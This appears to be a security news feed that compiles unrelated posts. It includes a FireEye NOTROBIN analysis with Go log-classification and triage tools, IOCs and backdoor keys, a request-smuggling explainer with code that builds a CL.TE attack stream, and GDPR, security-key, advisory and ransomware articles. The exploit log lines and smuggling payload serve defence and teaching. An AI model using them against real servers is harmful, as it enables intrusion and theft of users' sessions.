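127.0.0.2 - - [13/Jan/2020:05:09:07 -0500] "GET /vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-" "curl/7.47.0"
127.0.0.2 - - [13/Jan/2020:05:10:11 -0500] "GET /vpn/../vpns/portal/abcd1234abcd1234.xml HTTP/1.1" 200 2210 "-" "curl/7.47.0"
10.0.0.7 - - [13/Jan/2020:05:11:00 -0500] "GET /vpn/index.html HTTP/1.1" 200 1420 "-" "Mozilla/5.0"
`

// classify decides whether one request is an exploitation step. The
// "/vpn/../vpns/" traversal is the signature of the bug: "/vpn/" is reachable
// without authentication and the "../" escapes into the portal scripts.
func classify(method, path string, status int) (stage, outcome string, ok bool) {
	if !strings.Contains(path, "/../") || !strings.Contains(path, "/vpns/") {
		return "", "", false
	}
	switch {
	case method == "POST" && strings.Contains(path, "/vpns/portal/scripts/newbm.pl"):
		return "stage", "attacker command written into a template via newbm.pl", true
	case method == "GET" && strings.Contains(path, "/vpns/portal/") && strings.HasSuffix(path, ".xml"):
		switch {
		case status == 404:
			return "invoke", "template already gone at invocation (what NOTROBIN's deletion produces)", true
		case status >= 200 && status < 400:
			return "invoke", "template rendered, staged command most likely executed", true
		default:
			return "invoke", "template invocation returned HTTP " + strconv.Itoa(status), true
		}
	}
	return "traversal", "traversal into /vpns/ that is neither staging nor invocation; review manually", true
}

// Analyze runs classify over every line of an access log.
func Analyze(log string) []Finding {
	var out []Finding
	sc := bufio.NewScanner(strings.NewReader(log))
	for n := 1; sc.Scan(); n++ {
		m := logRe.FindStringSubmatch(sc.Text())
		if m == nil {
			continue
		}
		status, _ := strconv.Atoi(m[5])
		stage, outcome, ok := classify(m[3], m[4], status)
		if !ok {
			continue
		}
		out = append(out, Finding{Line: n, Client: m[1], Time: m[2], Stage: stage, Status: status, Outcome: outcome})
	}
	return out
}

func main() {
	for _, f := range Analyze(sampleLog) {
		fmt.Printf("line %d %s %s [%s] HTTP %d: %s\n", f.Line, f.Time, f.Client, f.Stage, f.Status, f.Outcome)
	}
}
```

Point Analyze at the real httpd access log and the interesting sequence is a "stage" finding followed, from the same client, by an "invoke" with a 2xx: that pair is a successful exploitation, whereas stage followed by 404 is what a NOTROBIN-protected (but still compromised) device produces.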

FireEye has not yet identified if the actor has returned to NOTROBIN backdoors.

Conclusion

FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators that check into their devices after reading Citrix security bulletin CTX267027. NOTROBIN mitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While we haven’t seen the actor return, we’re skeptical that they will remain a Robin Hood character protecting the internet from the shadows.

Indicators of Compromise and Discovery

Table 1 lists indicators that match the NOTROBIN variants FireEye has identified. The domain vilarunners[.]cat is the WordPress site that hosted NOTROBIN payloads; it resolved to 95.179.163[.]186 during the observed activity. As of January 15, vilarunners[.]cat resolves to a new IP address, 80.240.31[.]218.

IOC Item              Value
HTTP URL prefix       hxxps://95.179.163[.]186/wp-content/uploads/2018/09/
Directory             /var/nstmp/.nscache
Filename              /var/nstmp/.nscache/httpd
Directory             /tmp/.init
Filename              /tmp/.init/httpd
Crontab entry         /var/nstmp/.nscache/httpd
Listening UDP port    18634
Remote IP             95.179.163[.]186
Remote IP             80.240.31[.]218
Domain                vilarunners[.]cat

Table 1: Indicators of Compromise

Discovery on VirusTotal

You can use the following VTI queries to identify NOTROBIN variants on VirusTotal:

  • vhash:"73cee1e8e1c3265c8f836516c53ae042"
  • vhash:"e57a7713cdf89a2f72c6526549d22987"

Note, the vHash implementation is private, so we’re not able to confirm why this technique works. In practice, the vHashes cover the same variants identified by the Yara rule listed in Figure 9.

rule NOTROBIN
{
    meta:
        author = "william.ballenthin@fireeye.com"
        date_created = "2020-01-15"
    strings:
        $func_name_1 = "main.remove_bds"
        $func_name_2 = "main.xrun"
    condition:
        all of them
}

Figure 9: Yara rule that matches on NOTROBIN variants

Recovered Authentication Keys

FireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter compromised environments. We expect that these strings may be found within subsequent exploitation attempts, either as filenames or payload content. Although we won’t publish them here out of concern for our customers, please reach out if you’re looking for NOTROBIN within your environment and we can provide a list.
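Pulling the indicators in Table 1 together with the deletion rules described under Analysis of NOTROBIN, the following Go program is an added triage tool written for this page (not FireEye's code). It walks a copy of a NetScaler filesystem and reports the dropper paths, the cron persistence, templates that carry a key or the staged block string, and scripts written inside NOTROBIN's 14-day window. The two entries in KnownKeys are the keys visible in Figure 4 and Figure 5 and stand in for the unpublished list; the crontab location /var/cron/tabs/nobody is an assumption based on FreeBSD's layout; mtime is used as a stand-in for creation time.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strings"
	"time"
)

// KnownKeys stands in for the unpublished list: these two are the keys visible in
// Figure 4 and Figure 5, in the same 32-hex format as the rest.
var KnownKeys = []string{
	"64d4c2d3ee56af4f4ca8171556d50faa",
	"d474a8de77902851f96a3b7aa2dcbb8e",
}

var hexKeyRe = regexp.MustCompile(`[0-9a-f]{32}`)

// matchKey returns the first known key found in s, else any other 32-hex token
// (a possible key not yet seen), else "".
func matchKey(s string, keys []string) string {
	for _, k := range keys {
		if strings.Contains(s, k) {
			return k
		}
	}
	return hexKeyRe.FindString(s)
}

// Triage inspects a NetScaler filesystem mounted or copied at root and returns one
// line per NOTROBIN indicator. Timestamps only mean something if the copy kept them
// (dd image or rsync -a, not plain cp); mtime stands in for creation time.
func Triage(root string, keys []string, now time.Time) []string {
	var hits []string
	// 1. The staged dropper and the persistent copy NOTROBIN migrates to (Table 1).
	for _, p := range []string{"/tmp/.init/httpd", "/var/nstmp/.nscache/httpd"} {
		if _, err := os.Stat(filepath.Join(root, p)); err == nil {
			hits = append(hits, "file present: "+p)
		}
	}
	// 2. Persistence. Figure 3 shows the job running as "nobody"; per-user crontabs
	//    live under /var/cron/tabs on FreeBSD (assumed to hold for NetScaler).
	if b, err := os.ReadFile(filepath.Join(root, "/var/cron/tabs/nobody")); err == nil &&
		strings.Contains(string(b), "/var/nstmp/.nscache/httpd") {
		hits = append(hits, "crontab for nobody runs /var/nstmp/.nscache/httpd")
	}
	// 3. Templates. NOTROBIN deletes .xml files containing "block"/"BLOCK" unless the
	//    name carries its key, so a key-named survivor is the actor's own payload.
	tmplDir := filepath.Join(root, "/netscaler/portal/templates")
	entries, _ := os.ReadDir(tmplDir)
	for _, e := range entries {
		if e.IsDir() || !strings.HasSuffix(e.Name(), ".xml") {
			continue
		}
		b, err := os.ReadFile(filepath.Join(tmplDir, e.Name()))
		if err != nil {
			continue
		}
		if k := matchKey(e.Name()+" "+string(b), keys); k != "" {
			hits = append(hits, fmt.Sprintf("template %s carries NOTROBIN key %s", e.Name(), k))
		} else if strings.Contains(string(b), "block") || strings.Contains(string(b), "BLOCK") {
			hits = append(hits, "template "+e.Name()+" contains staged exploit code")
		}
	}
	// 4. Scripts written inside NOTROBIN's own 14-day deletion window: it removes
	//    anything that recent unless it carries the key, so survivors deserve a look.
	scriptDir := filepath.Join(root, "/netscaler/portal/scripts")
	entries, _ = os.ReadDir(scriptDir)
	for _, e := range entries {
		if info, err := e.Info(); err == nil && !e.IsDir() && now.Sub(info.ModTime()) < 14*24*time.Hour {
			hits = append(hits, "recently written portal script: "+e.Name())
		}
	}
	return hits
}

func main() {
	root := "/"
	if len(os.Args) > 1 {
		root = os.Args[1]
	}
	for _, h := range Triage(root, KnownKeys, time.Now()) {
		fmt.Println(h)
	}
}
```

Run it as `go run triage.go /mnt/netscaler` against a mounted image, or with no argument on the live device for a quick check. A clean device returns nothing; a step 4 hit on its own can be a recent firmware upgrade, but a step 1 or step 2 hit is the Table 1 indicator itself and is enough to start incident response. The UDP 18634 listener from Figure 7 is a live-system check (sockstat or netstat on the device) and is deliberately not part of this offline walk.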

Acknowledgements

Thank you to analysts across FireEye that are currently responding to this activity, including Brandan Schondorfer for collecting and interpreting artifacts, Steven Miller for coordinating analysis, Evan Reese for pivoting across intel leads, Chris Glyer for reviewing technical aspects, Moritz Raabe for reverse engineering NOTROBIN samples, and Ashley Frazer for refining the presentation and conclusions.

Testing Servers for Vulnerability to HTTP Desync Request Smuggling Attacks

A widespread vulnerability allows attackers to steal credentials, route victims to malicious URLs, and prevent users from using the targeted websites. The attack exploits a disagreement between a front-end server (a load balancer or reverse proxy) and the back-end server about where one HTTP request ends and the next begins, typically because one honours the Content-Length header and the other honours Transfer-Encoding: chunked. The bytes left over from the attacker's request are then treated by the back-end as the start of the next request on the same connection, which belongs to a victim, so the attacker controls part of a normal user's request. Several companies, including PayPal and Akamai, have paid tens of thousands of dollars in bug bounties to white hat hackers who identified this vulnerability in their systems.
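To make the splicing concrete, here is an added Go example (written for this page, not code from the original article) that frames the same byte stream twice, once the way a front-end that trusts Content-Length does and once the way a back-end that honours Transfer-Encoding: chunked does, and then shows the check a front-end should apply before forwarding. The attacker and victim requests, the host name vulnerable.example and the smuggled prefix are all constructed for the demonstration.

```go
package main
import (
	"bytes"
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// splitHead separates the header block (through the blank line) from the rest.
func splitHead(stream []byte) (head, body []byte, err error) {
	i := bytes.Index(stream, []byte("\r\n\r\n"))
	if i < 0 {
		return nil, nil, errors.New("incomplete headers")
	}
	return stream[:i+4], stream[i+4:], nil
}

// header returns the value of the first header called name, or "".
func header(head []byte, name string) string {
	for _, line := range strings.Split(string(head), "\r\n") {
		if kv := strings.SplitN(line, ":", 2); len(kv) == 2 && strings.EqualFold(strings.TrimSpace(kv[0]), name) {
			return strings.TrimSpace(kv[1])
		}
	}
	return ""
}

// frameByContentLength is the front-end's view: exactly Content-Length body bytes (0 if absent); Transfer-Encoding is ignored.
func frameByContentLength(stream []byte) (req, rest []byte, err error) {
	head, body, err := splitHead(stream)
	if err != nil {
		return nil, nil, err
	}
	if n, _ := strconv.Atoi(header(head, "Content-Length")); n <= len(body) {
		return stream[:len(head)+n], body[n:], nil
	}
	return nil, nil, errors.New("body shorter than Content-Length")
}

// frameByChunked is the back-end's view: the body ends at the zero-length chunk, whatever Content-Length says.
func frameByChunked(stream []byte) (req, rest []byte, err error) {
	head, body, err := splitHead(stream)
	if err != nil {
		return nil, nil, err
	}
	if !strings.EqualFold(header(head, "Transfer-Encoding"), "chunked") {
		return frameByContentLength(stream)
	}
	for pos := 0; ; {
		eol := bytes.Index(body[pos:], []byte("\r\n"))
		if eol < 0 {
			return nil, nil, errors.New("incomplete chunk-size line")
		}
		size, perr := strconv.ParseInt(string(body[pos:pos+eol]), 16, 32)
		if perr != nil {
			return nil, nil, perr
		}
		pos += eol + 2
		if size == 0 { // last chunk; an empty trailer section must follow
			if !bytes.HasPrefix(body[pos:], []byte("\r\n")) {
				return nil, nil, errors.New("missing trailer terminator")
			}
			return stream[:len(head)+pos+2], body[pos+2:], nil
		}
		if pos+int(size)+2 > len(body) {
			return nil, nil, errors.New("incomplete chunk")
		}
		pos += int(size) + 2
	}
}

// BuildStream is a constructed CL.TE attack: an attacker request, then an innocent victim request, as a
// front-end forwards them down one back-end connection. The prefix turns the victim's request line into a header.
func BuildStream() []byte {
	body := "0\r\n\r\n" + "GET /404 HTTP/1.1\r\nX-Ignore: "
	attacker := fmt.Sprintf("POST / HTTP/1.1\r\nHost: vulnerable.example\r\n"+
		"Content-Length: %d\r\nTransfer-Encoding: chunked\r\n\r\n%s", len(body), body)
	return []byte(attacker + "GET /account HTTP/1.1\r\nHost: vulnerable.example\r\nCookie: session=abc\r\n\r\n")
}

// RequestLines frames the stream repeatedly and returns each request line seen.
func RequestLines(stream []byte, frame func([]byte) ([]byte, []byte, error)) []string {
	var lines []string
	for len(stream) > 0 {
		req, rest, err := frame(stream)
		if err != nil {
			return append(lines, "error: "+err.Error())
		}
		lines, stream = append(lines, strings.SplitN(string(req), "\r\n", 2)[0]), rest
	}
	return lines
}

// IsAmbiguous is the front-end check: a request carrying both length mechanisms is rejected, not guessed at.
func IsAmbiguous(req []byte) bool {
	head, _, err := splitHead(req)
	return err == nil && header(head, "Content-Length") != "" && header(head, "Transfer-Encoding") != ""
}
```

Call `RequestLines(BuildStream(), frameByContentLength)` from a main or a test and the front-end sees two requests, POST / and GET /account; call it with frameByChunked and the back-end sees POST / followed by GET /404, with the victim's real request line absorbed into the X-Ignore header and the victim's cookie now attached to an attacker-chosen request. The fix is on the front-end side: reject anything IsAmbiguous flags (or normalise to one framing before forwarding), and never reuse a back-end connection after a parse error.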

GDPR Checklist For Small Businesses

The General Data Protection Regulation (GDPR), which came into effect in May 2018, meant some big changes in the way businesses collect and handle personal data. The idea behind the legislation is to give individuals better access to and control over their own personal data. While this is great news for individuals, it requires a little extra work from businesses, which must now have a legal basis for collecting data and must only use it for the intended purpose. What's more, they need to follow these rules to the letter and remain GDPR compliant at all times.

This applies to companies of all sizes – even your small business. If you collect personal data in any form, such as emails, addresses, names or financial details, your business needs to be GDPR compliant. If it’s found that you’re not effectively managing and protecting your data you could face a big fine. Though regulators may be a bit more lenient with smaller businesses depending on how much data you hold, an unwanted fine is always bad news. That’s why we’ve put together this checklist to help ensure your small business is GDPR compliant. In this guide we’ll look at:

  • Understanding your data and responsibilities
  • Defining your data consent policy
  • Access requests and disposing of old data
  • Setting up a data storage and security policy
  • Training all staff on GDPR
  • Creating data processing notices

  1. Understanding your data and responsibilities

In order to be GDPR compliant it’s important that you understand what data you’re collecting and your responsibilities as a business. It’s therefore a good idea to get clued up on what is defined as ‘personal data’ and set out strict guidelines on how much information you need to collect. This is because a huge part of GDPR is ensuring that you only collect personal information you actually need and that it is only used for the intended purpose. The less you collect the easier it is to stay compliant.

You’ll also want to ensure anyone that is involved in the handling of data understands how to collect and store the data effectively, as well as how to process it in line with GDPR. As you collect data, it’s a good idea to keep a note of how consent is being obtained and what processes the data goes through once it has been collected.

 

  2. Setting out your data consent policy

Getting clear and explicit consent from individuals to collect and use their data is one of the most important aspects of GDPR. For this reason, you need to outline to customers or those using your services why you’re collecting their data and how you intend to use it in the future. Once they have actively agreed, you can then collect their data – this is usually done through sign-up forms or pop-ups. However, if they do not give you permission then under no circumstances should you record their personal information.

You must be able to show that you have obtained consent for all the data you have collected; otherwise, you run the risk of being fined. Another point worth noting is that you can no longer rely on underhand tactics such as pre-ticked boxes to gain consent: these do not count as consent under GDPR and can land you in trouble. Finally, you must make it easy for individuals to opt out of receiving your communications. The best way to do this is by adding an unsubscribe link at the bottom of all emails.

 

  3. Access requests and disposing of old data

If the consent you obtained before GDPR came into force in May 2018 does not meet the new standard (for example, it was implied rather than freely given and specific), you must obtain it again. If customers do not give their consent a second time, or do not reply at all, you must delete their data as soon as possible. An important part of your GDPR checklist should be an auditing process that determines how long you will store data. For example, if a customer has not engaged with your brand in 12 months, it is no longer necessary to keep their information and it should therefore be deleted.

What's more, under GDPR every individual in the EU has the right to access their data, so you need a system in place to deal with access requests. You have one month from receiving a request to provide the individual with an electronic copy of all the information you hold on them. They can also request that this be deleted, so you need a process to get that done as quickly as possible.

 

  4. Setting up a data storage and security policy

GDPR is set out to protect the rights and personal information of individuals, therefore you need to make sure you’re taking care of the data you’re collecting. This means knowing where it is stored and ensuring you’ve got the security measures in place to keep it safe. Mapping out all the places where you store data, be that email, databases or cloud-based systems, makes it easier to find and deal with access or deletion requests. Your storage and security policy should outline where everything is stored, how it is protected and who has access to said data.

You also need to know how data is being transferred and the flow of information around your business. This stops information seemingly getting lost or falling into the wrong hands. It also pays to have a system in place just in case your hardware is accessed or lost, whilst containing sensitive information. For example, if a laptop full of information is misplaced, having the data encrypted means you’re less likely to fall victim to a breach or face a fine.

 

  5. Training all staff on GDPR

Most data breaches or security mistakes come as a result of human error. Unfortunately, ignorance is not an excuse for mishandling data. For this reason, it's important that all members of your team are clued up on GDPR, their personal responsibilities for looking after personal data, and how to recognise a breach. Under GDPR you must report a notifiable data breach to the supervisory authority within 72 hours of becoming aware of it; this is much easier if everyone in your team knows what a breach looks like and who to report it to.

 

  6. Creating data processing notices

Finally, data handling needs to be a clear and transparent process, so it's a good idea to create a notice explaining how your business collects and processes data. This is often called a Fair Processing Notice and can be sent to customers or users as well as being displayed on your website. It should outline how you capture, use and store data, and give instructions on how an individual can make an access or deletion request. This helps them understand how you are protecting their data and can be great for building your reputation as a legitimate and caring business.

 

The post GDPR Checklist For Small Businesses appeared first on CyberDB.

Have an iPhone? Use it to protect your Google Account with the Advanced Protection Program



Phishing—when an online attacker tries to trick you into giving them your username and password—is one of the most common causes of account compromises. We recently partnered with The Harris Poll to survey 500 high-risk users (politicians and their staff, journalists, business executives, activists, online influencers) living in the U.S. Seventy-four percent of them reported having been the target of a phishing attempt or compromised by a phishing attack.

Gmail automatically blocks more than 100 million phishing emails every day and warns people that are targeted by government-backed attackers, but you can further strengthen the security of your Google Account by enrolling in the Advanced Protection Program—our strongest security protections that automatically help defend against evolving methods attackers use to gain access to your personal and work Google Accounts and data.

Security keys are an important feature of the Advanced Protection Program, because they provide the strongest protection against phishing attacks. In the past, you had to separately purchase and carry physical security keys. Last year, we built security keys into Android phones—and starting today, you can activate a security key on your iPhone to help protect your Google Account.

Activating the security key on your iPhone with Google’s Smart Lock app

Security keys use public-key cryptography to verify both your identity and the URL of the login page, so an attacker cannot access your account even if they have your username and password. Unlike other two-factor authentication (2FA) methods that only try to verify your sign-in, security keys are built on FIDO standards that provide the strongest protection against automated bots, bulk phishing attacks, and targeted phishing attacks. You can learn more about security keys from our Cloud Next ‘19 presentation.


Approving the sign-in to a Google Account with Google’s SmartLock app on an iPhone

On your iPhone, the security key can be activated with Google’s Smart Lock app; on your Android phone, the functionality is built in. The security key in your phone uses Bluetooth to verify your sign-in on Chrome OS, iOS, macOS and Windows 10 devices without requiring you to pair your devices. This helps protect your Google Account on virtually any device with the convenience of your phone.
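The origin check is the part of "verify the URL of the login page" that does the anti-phishing work, so here is an added Go example, written for this page rather than taken from Google's Smart Lock or any FIDO library, that models a security key signing a challenge and a relying party verifying it. It follows the WebAuthn assertion layout (authenticatorData plus the hash of clientDataJSON, signed with ES256) but is a simplification: the relying party accounts.example, the phishing origin accounts-example.evil and the challenges are all made up, and the clientData carries only the two fields the example needs.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"encoding/json"
	"errors"
	"fmt"
)

// clientData is assembled by the browser, not the page, so Origin is the page's
// real origin and a look-alike site cannot choose it (real clientData also carries a type).
type clientData struct {
	Challenge string `json:"challenge"`
	Origin    string `json:"origin"`
}

// Assertion is what the security key hands back for the relying party to check.
type Assertion struct {
	AuthData   []byte // SHA-256(rpID) || flags || 32-bit signature counter
	ClientJSON []byte
	Sig        []byte
}

func newChallenge() string {
	b := make([]byte, 32)
	rand.Read(b)
	return base64.RawURLEncoding.EncodeToString(b)
}

// signedMessage is the ES256 input: SHA-256(authData || SHA-256(clientDataJSON)).
func signedMessage(authData, clientJSON []byte) []byte {
	ch := sha256.Sum256(clientJSON)
	m := sha256.Sum256(append(append([]byte{}, authData...), ch[:]...))
	return m[:]
}

// Sign models the security key for one credential scoped to rpID.
func Sign(priv *ecdsa.PrivateKey, rpID string, cd clientData, counter uint32) (Assertion, error) {
	cj, err := json.Marshal(cd)
	if err != nil {
		return Assertion{}, err
	}
	h := sha256.Sum256([]byte(rpID))
	ad := append(h[:], 0x01) // flags: user present
	var c [4]byte
	binary.BigEndian.PutUint32(c[:], counter)
	ad = append(ad, c[:]...)
	sig, err := ecdsa.SignASN1(rand.Reader, priv, signedMessage(ad, cj))
	return Assertion{AuthData: ad, ClientJSON: cj, Sig: sig}, err
}

// Verify models the relying party: origin defeats phishing, challenge defeats replay, the signature binds both.
func Verify(pub *ecdsa.PublicKey, rpID, origin, challenge string, a Assertion) error {
	var cd clientData
	if err := json.Unmarshal(a.ClientJSON, &cd); err != nil {
		return err
	}
	if cd.Challenge != challenge {
		return errors.New("challenge mismatch: stale or replayed assertion")
	}
	if cd.Origin != origin {
		return fmt.Errorf("origin %q is not %q: the sign-in came from another site", cd.Origin, origin)
	}
	want := sha256.Sum256([]byte(rpID))
	if len(a.AuthData) < 37 || !bytes.Equal(a.AuthData[:32], want[:]) {
		return errors.New("rpIdHash mismatch")
	}
	if !ecdsa.VerifyASN1(pub, signedMessage(a.AuthData, a.ClientJSON), a.Sig) {
		return errors.New("bad signature")
	}
	return nil // a real RP also requires the counter to increase between sign-ins
}

// Scenario runs four sign-ins against one registered key; only "legit" should verify.
func Scenario() map[string]error {
	priv, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	const rpID, origin = "accounts.example", "https://accounts.example"
	ch := newChallenge()
	good, _ := Sign(priv, rpID, clientData{ch, origin}, 1)
	// A phishing page can relay the real challenge, but the browser records the page's
	// own origin (and in practice refuses the credential, as rpID is not a suffix of it).
	phish, _ := Sign(priv, rpID, clientData{ch, "https://accounts-example.evil"}, 2)
	tampered := Assertion{AuthData: append([]byte{}, good.AuthData...), ClientJSON: good.ClientJSON, Sig: good.Sig}
	tampered.AuthData[36]++ // bump the counter without re-signing
	return map[string]error{
		"legit":    Verify(&priv.PublicKey, rpID, origin, ch, good),
		"phished":  Verify(&priv.PublicKey, rpID, origin, ch, phish),
		"replayed": Verify(&priv.PublicKey, rpID, origin, newChallenge(), good),
		"tampered": Verify(&priv.PublicKey, rpID, origin, ch, tampered),
	}
}
```

Call Scenario from a main or a test: "legit" returns nil and the other three return errors. The phished case is the one that matters for this post: the attacker has a perfectly valid signature from the real key over the real challenge, and it is still useless, because the origin the browser wrote into clientData is the phishing site's, not the relying party's. Contrast a one-time code, which carries no origin and works wherever the victim types it.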

How to get started

Follow these simple steps to help protect your personal or work Google Account today:
  • Activate your phone’s security key (Android 7+ or iOS 10+)
  • Enroll in the Advanced Protection Program
  • When signing in to your Google Account, make sure Bluetooth is turned on, on both your phone and the device you're signing in on.
We also highly recommend registering a backup security key to your account and keeping it in a safe place, so you can get into your account if you lose your phone. You can get a security key from a number of vendors, including Google, with our own Titan Security Key.

If you’re a Google Cloud customer, you can find out more about the Advanced Protection Program for the enterprise on our G Suite Updates blog.

Here’s to stronger account security—right in your pocket.

NIST Requesting Information to Upgrade the iEdison System

The National Institute of Standards and Technology (NIST) plans to begin modernizing the Interagency Edison System (iEdison) by using feedback and insights from the 32 agencies that currently use the older platform. NIST will launch the redesigned iEdison as a digital, governmental tool for the 21st century under the guidance of the Lab-to-Market cross agency priority goal and the White House’s Office of Science and Technology Policy and by focusing on advancing the President’s Management Agenda. The original iEdison platform was created in 1995 and hosted by the National Institute of Health

Advisory 2020-002: Critical Vulnerabilities for Microsoft Windows Announced, Patch Urgently

On 15 January 2020 (AEDT), Microsoft released security patches for three critical vulnerabilities and one important vulnerability in the Microsoft Remote Desktop Client, Remote Desktop Gateway and the Windows operating system. The ACSC recommends that users of these products apply the patches urgently to prevent malicious actors from using these vulnerabilities to compromise their networks.

Microsoft rolls out Windows 10 security fix after NSA warning

US agency revealed flaw that could be exploited by hackers to create malicious software

Microsoft is rolling out a security fix to Windows 10 after the US National Security Agency (NSA) warned the popular operating system contained a highly dangerous flaw that could be used by hackers. Reporting the vulnerability represents a departure for the NSA from its past strategy of keeping security flaws under wraps to exploit for its own intelligence needs.

The NSA revealed during a press conference on Tuesday that the “serious vulnerability” could be used to create malicious software that appeared to be legitimate. The flaw “makes trust vulnerable”, the NSA director of cybersecurity, Anne Neuberger, said in a briefing call to media on Tuesday.


Securing open-source: how Google supports the new Kubernetes bug bounty

At Google, we care deeply about the security of open-source projects, as they’re such a critical part of our infrastructure—and indeed everyone’s. Today, the Cloud-Native Computing Foundation (CNCF) announced a new bug bounty program for Kubernetes that we helped create and get up and running. Here’s a brief overview of the program, other ways we help secure open-source projects and information on how you can get involved.

Launching the Kubernetes bug bounty program

Kubernetes is a CNCF project. As part of its graduation criteria, the CNCF recently funded the project’s first security audit, to review its core areas and identify potential issues. The audit identified and addressed several previously unknown security issues. Thankfully, Kubernetes already had a Product Security Committee, including engineers from the Google Kubernetes Engine (GKE) security team, who respond to and patch any newly discovered bugs. But the job of securing an open-source project is never done. To increase awareness of Kubernetes’ security model, attract new security researchers, and reward ongoing efforts in the community, the Kubernetes Product Security Committee began discussions in 2018 about launching an official bug bounty program.

Find Kubernetes bugs, get paid

What kind of bugs does the bounty program recognize? Most of the content you’d think of as ‘core’ Kubernetes, included at https://github.com/kubernetes, is in scope. We’re interested in common kinds of security issues like remote code execution, privilege escalation, and bugs in authentication or authorization. Because Kubernetes is a community project, we’re also interested in the Kubernetes supply chain, including build and release processes that might allow a malicious individual to gain unauthorized access to commits, or otherwise affect build artifacts. This is a bit different from your standard bug bounty as there isn’t a ‘live’ environment for you to test—Kubernetes can be configured in many different ways, and we’re looking for bugs that affect any of those (except when existing configuration options could mitigate the bug). Thanks to the CNCF’s ongoing support and funding of this new program, depending on the bug, you can be rewarded with a bounty anywhere from $100 to $10,000.

The bug bounty program has been in a private release for several months, with invited researchers submitting bugs and helping us test the triage process. And today, the new Kubernetes bug bounty program is live! We’re excited to see what kind of bugs you discover, and are ready to respond to new reports. You can learn more about the program and how to get involved here.

Dedicated to Kubernetes security

Google has been involved in this new Kubernetes bug bounty from the get-go: proposing the program, completing vendor evaluations, defining the initial scope, testing the process, and onboarding HackerOne to implement the bug bounty solution. Though this is a big effort, it’s part of our ongoing commitment to securing Kubernetes. Google continues to be involved in every part of Kubernetes security, including responding to vulnerabilities as part of the Kubernetes Product Security Committee, chairing the sig-auth Kubernetes special interest group, and leading the aforementioned Kubernetes security audit. We realize that security is a critical part of any user’s decision to use an open-source tool, so we dedicate resources to help ensure we’re providing the best possible security for Kubernetes and GKE.

Although the Kubernetes bug bounty program is new, it isn’t a novel strategy for Google. We have enjoyed a close relationship with the security research community for many years and, in 2010, Google established our own Vulnerability Rewards Program (VRP). The VRP provides rewards for vulnerabilities reported in GKE and virtually all other Google Cloud services. (If you find a bug in GKE that isn’t specific to Kubernetes core, you should still report it to the Google VRP!) Nor is Kubernetes the only open-source project with a bug bounty program. In fact, we recently expanded our Patch Rewards program to provide financial rewards both upfront and after-the-fact for security improvements to open-source projects.

Help keep the world’s infrastructure safe. Report a bug to the Kubernetes bug bounty, or a GKE bug to the Google VRP.

Travelex says it won’t pay ransom to crooks as currency chaos continues

While most of us spent New Year’s Eve celebrating, the IT department at Travelex was grappling with a ransomware virus that was spreading through its systems.

Almost two weeks on, the currency exchange service is finally starting to restore its internal systems, having been forced to take its website offline and suspend many of its operations.

Employees have been forced to work with pen and paper, severely delaying the few processes that could still be performed, while several UK banks that work with the company have had to turn away customers who wanted to order foreign banknotes.

A Royal Bank of Scotland representative said: “We are currently unable to accept any travel money orders either online, in branch or by telephone due to issues with our travel-money supplier, Travelex.

“We apologise for any inconvenience caused.”

Lloyds and Barclays have issued similar statements, causing huge problems for people across the country who are looking to convert their pounds into foreign currency.


What is ransomware?

Ransomware is a specific type of malware that encrypts computer files, essentially locking the owner out of their systems.

The ransomware will then display a message demanding that the victim make a payment to regain access.

Criminals generally plant malware on victims’ computers by hiding it in an attachment contained within a phishing email.


Why not just pay the ransom?

Many ransomware victims feel obliged to pay up, because it’s the quickest way to get back to business.

However, experts generally urge organisations not to negotiate, because payments help fuel the cyber crime industry and there’s no guarantee that meeting the criminals’ demands will put the infected organisation in a better position.

For example, there’s the possibility that the cyber criminals will up the ransom demand if you try to negotiate, or that they won’t keep their word once you’ve paid.

There have also been cases where the ransomware has contained bugs that make it impossible to decode the data once you’ve received the decryption key.

You should also acknowledge that buying your freedom will only solve one small problem. Your IT team will still have to spend hours – if not days – restoring your systems, and you’ll still face the repercussions of massive delays.

That’s why experts say it’s better to use the money to get straight to your recovery. You’ll have the moral victory of fighting off cyber criminals – demonstrating in the process that it’s not worth targeting you again in the future – while also approaching the situation proactively.


Proactivity is essential when it comes to security incidents, because you’ll need to prove that you’ve considered the risks and have a response plan.

This is equally important for employees, who should feel that management has the situation under control, as it is for the ICO (Information Commissioner’s Office), which regulates GDPR (General Data Protection Regulation) compliance in the UK.

A further problem Travelex faces is that it didn’t report the incident to the ICO when it was first infected. And remember, it’s still a data breach if cyber criminals are locking you out of your systems rather than stealing sensitive data. That’s because a data breach is classed as anything that affects the confidentiality, integrity or availability of information.

Ransomware attacks can also develop into ‘traditional’ data breaches if the criminals are able to access information from the locked systems. The criminal hackers in this case have claimed to have done exactly that, siphoning off 5 GB of data from Travelex’s databases.

Preventing ransomware attacks

It’s impossible to avoid the risk of ransomware altogether, because there are so many ways that cyber criminals can target you.

However, as the majority of infections are the result of malicious attachments in phishing emails, you can eradicate your biggest threat by training employees to spot suspicious messages.

You can give them the tools they need by enrolling them on our phishing and ransomware e-learning course.

This ten-minute course introduces employees to the associated risks and describes the link between phishing and ransomware. Armed with this knowledge, your staff will be better equipped to detect suspicious emails and know how to respond.


The post Travelex says it won’t pay ransom to crooks as currency chaos continues appeared first on IT Governance UK Blog.

20 IT resolutions for 2020

Even in the high-touch field of healthcare, where human interactions remain core to the delivery of most services, IT exec Bill Fandrich feels the pressure to bring technology-fueled transformations to bear.

Fandrich, senior vice president and CIO of Blue Cross Blue Shield of Michigan, says he must focus on how to use technology to create higher quality, more affordable services as well as to improve interactions for administrators, medical providers and patients. And he must determine, out of all the technology options available, which ones deliver the most returns for the best value based on his company’s overall goals and objectives.

He takes the pressure in stride, saying: “It’s kind of amazing being in technology now because there has not been a more impactful time when it comes to the value and importance of IT.”


Securing Interactive Kiosks IoTs with the Paradox OS

Article by Bernard Parsons, CEO, Becrypt

